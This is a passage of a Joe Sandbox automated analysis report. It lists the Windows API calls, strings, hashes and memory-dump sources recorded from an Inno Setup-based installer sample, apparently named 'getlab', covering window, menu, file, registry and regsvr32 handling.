                                                                          • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049632D), ref: 004961FA
                                                                          • CreateWindowExA.USER32(00000000,STATIC,0049633C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496221
                                                                          • SetWindowLongA.USER32(?,000000FC,004959B4), ref: 00496234
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC,0049633C), ref: 00496264
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004962D8
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000), ref: 004962E4
                                                                            • Part of subcall function 00453D04: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                          • 73A25CF0.USER32(?,00496307,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC), ref: 004962FA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                          • API String ID: 170458502-2312673372
                                                                          • Opcode ID: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                                          • Instruction ID: 59c6668a25180793b9734d4b881d6428f2164d7595bd96eb0933aaec2009094d
                                                                          • Opcode Fuzzy Hash: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                                          • Instruction Fuzzy Hash: 30413070A00204AFDF11EBA5DD42FAE7BB8EB09714F61457AF500F7291D7799A048B68
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E439
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E43F
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E48D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: %aE$.DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-4073108654
                                                                          • Opcode ID: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                                          • Instruction ID: 54e13c124a033066941eeca65415b1323707e8dcf3020f71d3dbb5d1a98da02b
                                                                          • Opcode Fuzzy Hash: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                                          • Instruction Fuzzy Hash: C5214430B10225BBDB00EAE7DC45B9E76B8EB48708F904477A500E7281E77CDE419B1C
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 00462824
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462838
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462845
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462852
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0046289E
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004628DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                                          • Instruction ID: 4c37a186de2a83ca6a9e6f1427afc5cce354ac5e92891655707437263646b99d
                                                                          • Opcode Fuzzy Hash: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                                          • Instruction Fuzzy Hash: 8621C571700B006BD310E664DD41F3B3798EB84710F08063AF984DB3D2EAB8EC008B9A
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042F18C
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A0
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1AD
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1BA
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0042F206
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F244
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                                          • Instruction ID: fe4b6ce3f65a79f89e9c436b8398c0b3b6e1cac74b3897b930778965e8aa8e9e
                                                                          • Opcode Fuzzy Hash: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                                          • Instruction Fuzzy Hash: 8A21D479300710ABD700D668EC81F3B36E8EB85710F88457AF944DB3C1DA79EC048BA9
                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C1B,?,00000000,00458C7E,?,?,02153858,00000000), ref: 00458A99
                                                                          • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458AF6
                                                                          • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458B03
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B4F
                                                                          • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458BB0,?,00000000), ref: 00458B75
                                                                          • GetLastError.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458BB0,?,00000000), ref: 00458B7C
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                          • String ID: CreateEvent$TransactNamedPipe
                                                                          • API String ID: 2182916169-3012584893
                                                                          • Opcode ID: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                                          • Instruction ID: 8abbb299140198d1acf2f300c186b6d7a0c7583c2a92940a340f901db1703015
                                                                          • Opcode Fuzzy Hash: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                                          • Instruction Fuzzy Hash: D4418771A00608EFDB15DF95CD81F9EB7F8EB48714F10406AF904F7292DA789E44CA28
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CA5,?,?,00000031,?), ref: 00456B68
                                                                          • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B6E
                                                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BBB
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                          • API String ID: 1914119943-2711329623
                                                                          • Opcode ID: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                                          • Instruction ID: 90c7a9fdd6b9eff4f50a7868ac1bc5a0a48bbd230e3c9f86fc21845b06ed4ed7
                                                                          • Opcode Fuzzy Hash: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                                          • Instruction Fuzzy Hash: 1B31B271A00A04AF9702EFAACC51D5BB7BDEB89746752846AFC04D3752DA38DD04C768
                                                                          APIs
                                                                          • RectVisible.GDI32(?,?), ref: 00416E0B
                                                                          • SaveDC.GDI32(?), ref: 00416E1F
                                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E42
                                                                          • RestoreDC.GDI32(?,?), ref: 00416E5D
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416EDD
                                                                          • FrameRect.USER32(?,?,?), ref: 00416F10
                                                                          • DeleteObject.GDI32(?), ref: 00416F1A
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416F2A
                                                                          • FrameRect.USER32(?,?,?), ref: 00416F5D
                                                                          • DeleteObject.GDI32(?), ref: 00416F67
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                          • String ID:
                                                                          • API String ID: 375863564-0
                                                                          • Opcode ID: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                                          • Instruction ID: 3aa003abb57efcc62207c922e0442432c52dbc4458161ac97ea4a6727b5fec63
                                                                          • Opcode Fuzzy Hash: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                                          • Instruction Fuzzy Hash: 7F512B716086459FDB50EF29C8C0B9777E8AF48314F15466ABD889B287C738EC81CB99
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                          • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 0042222B
                                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422249
                                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422256
                                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422263
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422270
                                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042227D
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042228A
                                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422297
                                                                          • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222B5
                                                                          • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$EnableItem$System
                                                                          • String ID:
                                                                          • API String ID: 3985193851-0
                                                                          • Opcode ID: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                          • Instruction ID: 3d512aed001548988d9f6823c75d43677a46120aeb5bb01c9b252fa7414fdf33
                                                                          • Opcode Fuzzy Hash: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                          • Instruction Fuzzy Hash: 692144703407447AE720E724DD8BFABBBD8AB04708F1455A5B6487F6D3C2F9AB804698
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(10000000), ref: 00480FD5
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00480FE9
                                                                          • SendNotifyMessageA.USER32(0001043E,00000496,00002710,00000000), ref: 0048105B
                                                                          Strings
                                                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048100A
                                                                          • GetCustomSetupExitCode, xrefs: 00480E75
                                                                          • DeinitializeSetup, xrefs: 00480ED1
                                                                          • Deinitializing Setup., xrefs: 00480E36
                                                                          • Restarting Windows., xrefs: 00481036
                                                                          Similarity
                                                                          • API ID: FreeLibrary$MessageNotifySend
                                                                          • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                          • API String ID: 3817813901-1884538726
                                                                          • Opcode ID: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                          • Instruction ID: 3a7bead0d2027120b4b43806ed62f13ca717c16daae07b60498e62be9a129c9c
                                                                          • Opcode Fuzzy Hash: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                          • Instruction Fuzzy Hash: 6E5191307042409FD711EB65D9A5B6E77E8EB5A304F50887BF900D73A2CB38A849CB9D
                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(?), ref: 004614EF
                                                                          • GetActiveWindow.USER32 ref: 00461553
                                                                          • CoInitialize.OLE32(00000000), ref: 00461567
                                                                          • SHBrowseForFolder.SHELL32(?), ref: 0046157E
                                                                          • CoUninitialize.OLE32(004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 00461593
                                                                          • SetActiveWindow.USER32(?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615A9
                                                                          • SetActiveWindow.USER32(?,?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615B2
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                          • String ID: A
                                                                          • API String ID: 2684663990-3554254475
                                                                          • Opcode ID: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                                          • Instruction ID: 3b7aa7431835c7c777c0b5d0eb650662cb24b1be5a668883a221ebb7e5be7499
                                                                          • Opcode Fuzzy Hash: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                                          • Instruction Fuzzy Hash: 05310F70D00218AFDB00EFA6D885A9EBBF8EF09304F55847AF415E7251E6789A04CB5A
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD,?,?,00000000,00472D6C), ref: 00472804
                                                                            • Part of subcall function 0042CD8C: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE02
                                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD), ref: 0047287B
                                                                          • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000), ref: 00472881
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                          • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                          • API String ID: 884541143-1710247218
                                                                          • Opcode ID: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                                          • Instruction ID: 279d6da86f281c7a9c803d865f3c4407023b84140d9db6ac64499a617a38ab60
                                                                          • Opcode Fuzzy Hash: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                                          • Instruction Fuzzy Hash: 8A11E270B005147BDB01F6658D82BAE73ACDB45754F62827BB804A72C1DB7C9E028A1E
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D0DD
                                                                          • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D0ED
                                                                          • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D0FD
                                                                          • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D10D
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                          • API String ID: 190572456-3516654456
                                                                          • Opcode ID: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                                          • Instruction ID: 76eb10cdb098e6f3740e4570fa0e0ca14f9d337f92906be3718b60d9f676c82f
                                                                          • Opcode Fuzzy Hash: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                                          • Instruction Fuzzy Hash: 800112B0D01B00DAE724DFB69DD572736A5ABA4306F10C13B9C49D62A2D77D0859DF2C
                                                                          APIs
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A9B1
                                                                          • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A9EB
                                                                          • SetBkColor.GDI32(?,?), ref: 0041AA00
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA4A
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AA55
                                                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA65
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAA4
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AAAE
                                                                          • SetBkColor.GDI32(00000000,?), ref: 0041AABB
                                                                          Similarity
                                                                          • API ID: Color$StretchText
                                                                          • String ID:
                                                                          • API String ID: 2984075790-0
                                                                          • Opcode ID: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                                          • Instruction ID: f35f62ab74b2522f6310a7e8d9a92b24202350a16c816e0881424610f10e5e30
                                                                          • Opcode Fuzzy Hash: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                                          • Instruction Fuzzy Hash: 9F61C7B5A00105AFCB40EFADD985E9EB7F8EF08314B1085AAF518DB262C735ED408F58
                                                                          APIs
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458098,?, /s ",?,regsvr32.exe",?,00458098), ref: 0045800A
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CloseDirectoryHandleSystem
                                                                          • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                          • API String ID: 2051275411-1862435767
                                                                          • Opcode ID: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                                          • Instruction ID: 56a02eb2220928eb4cb829bb83c6f501b915172eb664170f25c545f5d36e4a23
                                                                          • Opcode Fuzzy Hash: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                                          • Instruction Fuzzy Hash: 80413670A003086BDB10EFE5D842B8EB7B9AF44705F50407FA904BB297DF789A0D8B19
                                                                          APIs
                                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A1
                                                                          • GetSysColor.USER32(00000014), ref: 0044D1A8
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C0
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1E9
                                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1F3
                                                                          • GetSysColor.USER32(00000010), ref: 0044D1FA
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D212
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D23B
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D266
                                                                          Similarity
                                                                          • API ID: Text$Color$Draw$OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 1005981011-0
                                                                          • Opcode ID: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                                          • Instruction ID: 3fa3981ec5684e07db84b004592342e93505d63b705e9416633fcf0049301179
